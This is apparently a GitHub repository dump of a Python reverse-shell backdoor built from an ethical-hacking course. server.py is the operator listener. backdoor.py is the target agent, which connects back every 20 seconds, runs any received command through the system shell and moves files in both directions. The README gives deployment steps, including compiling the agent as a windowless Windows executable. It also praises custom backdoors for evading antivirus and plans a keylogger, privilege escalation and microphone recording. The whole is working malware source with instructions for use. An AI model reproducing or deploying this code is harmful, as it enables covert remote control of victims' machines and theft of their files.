├── .gitignore
├── server.py
├── backdoor.py
└── README.md

/.gitignore:
--------------------------------------------------------------------------------
/venv/
.idea
--------------------------------------------------------------------------------
/server.py:
--------------------------------------------------------------------------------
"""Operator-side listener for the reverse-shell project.

Binds SERVER_IP:SERVER_PORT, accepts a single inbound TCP connection from
backdoor.py, then relays commands typed at the local prompt and prints the
output the remote side returns.  Messages are JSON text over plain TCP with
no length framing and no encryption, so the whole exchange is visible on
the wire.
"""
import os
import socket
import json

# Listener address; the README tells deployers to change SERVER_IP per setup.
SERVER_IP = '192.168.254.49' # IP of my Kali Linux machine
SERVER_PORT = 5555


def reliable_send(data) -> None:
    """Serialise *data* as JSON and write it to the module-level target_sock.

    A single send() with no length prefix; the peer detects the end of a
    message only by trying json.loads() on what it has accumulated so far
    (see reliable_recv).
    """
    json_data = json.dumps(data)
    target_sock.send(json_data.encode())


def reliable_recv():
    """Read 1024-byte chunks from target_sock until they parse as one JSON document.

    Returns whatever json.loads() produces.  A ValueError from json.loads()
    is treated as "message not complete yet" rather than as an error, so the
    loop simply keeps reading.
    """
    data = ''
    while True:
        try:
            data = data + target_sock.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue


def upload_file(filename) -> None:
    """Send the local file *filename* to the target as raw bytes.

    The whole file is read into memory and handed to one send(); there is no
    size header, so the receiving side stops on a read timeout instead.
    """
    file = open(filename, 'rb')
    target_sock.send(file.read())
    file.close()


def download_file(filename) -> None:
    """Receive raw bytes from the target and write them to local *filename*.

    The socket is put into a 1-second timeout and chunks are appended until a
    recv() times out -- that timeout is the only end-of-file signal in this
    protocol.  The timeout is reset to blocking (None) afterwards.
    """
    file = open(filename, 'wb')
    target_sock.settimeout(1)
    chunk = target_sock.recv(1024)
    while chunk:
        file.write(chunk)
        try:
            chunk = target_sock.recv(1024)
        except socket.timeout:
            break
    target_sock.settimeout(None)
    file.close()


def target_communication() -> None:
    """Interactive command loop: read a line, forward it, handle the reply.

    Every typed line is sent to the target first (including 'quit', 'clear'
    and 'cd ...'); the if-chain then decides what happens locally: 'quit'
    ends the loop, 'cd ' is handled entirely on the target, 'clear' clears the
    operator's own terminal, 'download '/'upload ' switch to raw file
    transfer, and anything else waits for and prints the command output.
    """
    while True:
        command = input(f'* Shell~{str(target_ip)}: ')
        reliable_send(command)
        if command == 'quit':
            break
        elif command[:3] == 'cd ':
            pass  # the directory change happens on the target; nothing to do here
        elif command == 'clear':
            os.system('clear')  # clears the local operator terminal only
        elif command[:9] == 'download ':
            download_file(command[9:])
        elif command[:7] == 'upload ':
            upload_file(command[7:])
        else:
            result = reliable_recv()
            print(result)


# Module-level setup: listen, accept exactly one target, then run the loop.
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind((SERVER_IP, SERVER_PORT))

print('[+] Listening For Incoming Connections')
server_sock.listen(5)
target_sock, target_ip = server_sock.accept()
print(f'[+] Target Connected From: {str(target_ip)}')

target_communication()
--------------------------------------------------------------------------------
/backdoor.py:
--------------------------------------------------------------------------------
"""Target-side agent for the reverse-shell project.

Periodically opens an outbound TCP connection to SERVER_IP:SERVER_PORT and
then executes whatever command strings arrive, with the privileges of the
user who launched it.  Network- and host-observable behaviour: a
sleep-then-connect loop to one fixed address every 20 s, plaintext JSON
command/output traffic, and shell child processes spawned from this Python
process.
"""
import socket
import json
import time
import subprocess
import os

# Address of the listener (server.py); must match the value there.
SERVER_IP = '192.168.254.49' # IP of my Kali Linux machine
SERVER_PORT = 5555


def reliable_send(data) -> None:
    """Serialise *data* as JSON and write it to the module-level target_sock (one unframed send())."""
    json_data = json.dumps(data)
    target_sock.send(json_data.encode())


def reliable_recv():
    """Accumulate recv() chunks until json.loads() succeeds.

    A ValueError from json.loads() means "keep reading"; the decoded object is
    returned once a complete JSON document has arrived.
    """
    data = ''
    while True:
        try:
            data = data + target_sock.recv(1024).decode().rstrip()
            return json.loads(data)
        except ValueError:
            continue


def connection() -> None:
    """Connect-back loop.

    Sleeps 20 s, connects to the listener, runs shell() until it returns,
    then closes the socket and breaks out.  The bare except catches any
    failure -- a refused connection as well as an exception raised inside
    shell() -- and calls connection() again, so retries nest recursively
    rather than iterating through the while loop.
    """
    while True:
        time.sleep(20)
        try:
            target_sock.connect((SERVER_IP, SERVER_PORT))
            shell()
            target_sock.close()
            break
        except:
            connection()


def upload_file(filename) -> None:
    """Send the local file *filename* (on the target) to the listener as raw bytes in one send()."""
    file = open(filename, 'rb')
    target_sock.send(file.read())
    file.close()


def download_file(filename) -> None:
    """Write raw bytes from the listener to *filename* on the target.

    Reads with a 1-second timeout; the first recv() that times out ends the
    transfer, after which the socket is returned to blocking mode.
    """
    file = open(filename, 'wb')
    target_sock.settimeout(1)
    chunk = target_sock.recv(1024)
    while chunk:
        file.write(chunk)
        try:
            chunk = target_sock.recv(1024)
        except socket.timeout:
            break
    target_sock.settimeout(None)
    file.close()


def shell() -> None:
    """Command dispatch loop (the mirror of target_communication() in server.py).

    'quit' ends the session; 'clear' is a no-op here (it only clears the
    operator's terminal); 'cd ' changes this process's working directory;
    'download ' sends a local file to the listener and 'upload ' receives one.
    Any other string is passed verbatim to the system shell (shell=True) and
    its stdout followed by its stderr is sent back as one decoded string.
    """
    while True:
        command = reliable_recv()
        if command == 'quit':
            break
        elif command == 'clear':
            pass
        elif command[:3] == 'cd ':
            os.chdir(command[3:])
        elif command[:9] == 'download ':
            upload_file(command[9:])  # "download" from the operator's view means "send" from here
        elif command[:7] == 'upload ':
            download_file(command[7:])
        else:
            # The received string is handed to the system shell unchanged and
            # runs with the privileges of whoever started this script.
            execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                       stdin=subprocess.PIPE)
            result = execute.stdout.read() + execute.stderr.read()
            result = result.decode()
            reliable_send(result)


# Module-level entry: one socket object is reused across connection() retries.
target_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection()
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Python Backdoor Coding Project

## Description

This project was created by following a tutorial from a course I found on Udemy:
[Complete Ethical Hacking Bootcamp 2023: Zero to Mastery](https://www.udemy.com/course/complete-ethical-hacking-bootcamp-zero-to-mastery/)

The course is a comprehensive overview of ethical hacking and penetration testing concepts.
This backdoor project contains two main programs:

`backdoor.py` - the file that runs on the target machine, the one you want to exploit

`server.py` - the file that runs on your own machine, the one sending the commands

These programs will work together to create a reverse TCP connection that allows you to send commands from your machine that the target machine executes, and the target machine sends back the output.

### Why Code Our Own Backdoor?

There are many reasons why it's useful to code our own backdoor program (as opposed to using premade exploits from a framework such as _Metasploit_):

1. **Customization**

By developing your own backdoor, you have complete control over its functionality, features, and behavior. You can adapt it to meet your specific needs and objectives, making it easier to integrate into your existing infrastructure or target environment.

2. **Stealth and Evasion**

Custom backdoors may be harder to detect by antivirus software or intrusion detection systems. By writing your own code, you can implement techniques to evade detection, such as using obfuscation, encryption, or anti-analysis methods.
This can increase your chances of successfully infiltrating a target system. 28 | 29 | 3. **Education and Learning** 30 | 31 | When you create your own backdoor from scratch, it provides an excellent opportunity to learn and understand the intricacies of network protocols, security vulnerabilities, and exploit techniques. It allows you to deepen your knowledge of how these systems work and how they can be exploited, which can be valuable for defensive purposes as well. 32 | 33 | 4. **Tailored Exploitation** 34 | 35 | Premade exploits like those in _Metasploit_ often target known vulnerabilities in common software. However, if you encounter a unique or undisclosed vulnerability, coding your own backdoor allows you to specifically target and exploit that particular weakness, which gives you an advantage over other exploits. 36 | 37 | 5. **Adaptability** 38 | 39 | The security landscape is constantly evolving, with new defenses and countermeasures being developed regularly. By coding your own backdoor, you can continuously update and adapt it to bypass emerging security mechanisms. This flexibility can be particularly useful when dealing with hardened or well-protected systems. 40 | 41 | ### Base Functionality 42 | 43 | Once the reverse TCP connection has been created, the attacking machine can send and run any command that the current user on the target machine could run, whether that's on a Windows command prompt or Unix terminal. 44 | 45 | The base functionality of this project is relatively rudimentary. 
Here is the short list of commands that can be run in addition to the commands that you can naturally run on the target machine: 46 | 47 | * `cd ` - changes the current working directory on the target machine 48 | * `download ` - downloads a file from the target machine to the current working directory on the attacking machine 49 | * `upload ` - uploads a file from the attacking machine to the current working directory on the target machine 50 | * `clear` - clears the terminal 51 | * `quit` - closes the connection and exits both programs 52 | 53 | ### Additional Functionality 54 | 55 | There are a handful of possible features I'd like to add on top of the base program. 56 | 57 | | Feature | Status | Description | 58 | |---------------------|--------|----------------------------------------------------| 59 | | Keylogger | ❌ | Capture and record keystrokes from the target | 60 | | Privilege Elevation | ❌ | Run commands as root on Unix or System on Windows | 61 | | Record Microphone | ❌ | Record voice input from the target (if applicable) | 62 | | Screenshot Desktop | ❌ | Get screen grabs of the target's screen | 63 | 64 | ## Setup and Installation 65 | 66 | 1. Start by cloning the project's repository onto your attacking machine. 67 | 68 | `git clone https://github.com/JaredMHarding/backdoor` 69 | 70 | 2. In both `server.py` and `backdoor.py`, there are two variables called `SERVER_IP` and `SERVER_PORT`. Their default values are based on my personal Kali Linux machine's IP address and port number. **Make sure to update `SERVER_IP` in both files to whatever your attacking machine's IP is**, otherwise the backdoor will not work. `SERVER_PORT` is arbitrary and can remain the same unless there's already another program/service running on the default port. 71 | 72 | 3. If you plan to run `backdoor.py` in a Windows environment, then you will need to compile the program on a Windows machine with Python 3 installed to create an executable file. 
Copy `backdoor.py` onto the Windows machine, and follow these steps... 73 | 1. Open a command prompt and navigate to the directory where you copied `backdoor.py`. 74 | 2. To compile the program, you will need the PyInstaller library. If you don't already have PyInstaller on your machine, install it with `pip install pyinstaller`. 75 | 3. Once PyInstaller is installed, run this command: 76 | 77 | ```cmd 78 | pyinstaller backdoor.py --onefile --noconsole 79 | ``` 80 | 81 | This will compile the program into an executable file called `backdoor.exe` in a folder named `dist`. You are now ready to run the backdoor. 82 | 83 | If you plan to run the backdoor on a Unix machine, no extra steps are needed, just copy `backdoor.py` onto the target machine. 84 | 85 | 4. You should now be ready to use the backdoor program. Run the server file with `python3 server.py` on your attacking machine, then run the backdoor on the target machine in the directory the backdoor file is in: 86 | - Windows: Run `start backdoor.exe` in the command prompt (or just double-click the file in the file explorer) 87 | - Unix: Run `python3 backdoor.py` in a terminal 88 | 89 | After a short delay, the connection should be created and a shell will appear on your attacking machine's terminal. You should now be able to run any of the commands listed in the functionality sections. 90 | 91 | ## Credits 92 | 93 | The base project was coded by following an online tutorial. I plan to add more functionality to the project over time. 94 | 95 | ### Links 96 | 97 | * [zerotomastery.io](https://zerotomastery.io/) 98 | * Instructors: 99 | * [Andrei Neagoie](https://github.com/aneagoie) (Owner of Zero To Mastery) 100 | * Aleksa Tamburkovski (This project's code was based on his lesson from the course) --------------------------------------------------------------------------------